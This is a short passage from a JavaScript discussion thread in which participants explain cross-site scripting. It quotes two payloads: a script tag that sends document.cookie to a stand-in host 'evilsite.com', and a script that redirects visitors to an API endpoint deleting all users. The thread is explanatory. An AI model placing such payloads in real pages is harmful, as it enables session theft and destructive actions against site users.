Message from JavaScript discussions

April 2019

— Not like such

— What if someone set it to:
<script>fetch('http://evilsite.com/?secretdata=' + document.cookie)</script>

— Do you see the problem with this?

— What will it do?

— Will send the cookies from every user that logs onto the site to the attacker's server

— And the attacker will potentially have their login session

— That's scary

— I get JSON data in which the data are signatured. I have to extract the data from the JSON object and append it as rows dynamically into a table

— What about this:
<script>location.href='/api/delete/user/all'</script>

— Please help, anybody

— Every user that visits the site will now get redirected to the site's API

— And potentially execute some operation (while logged in as them)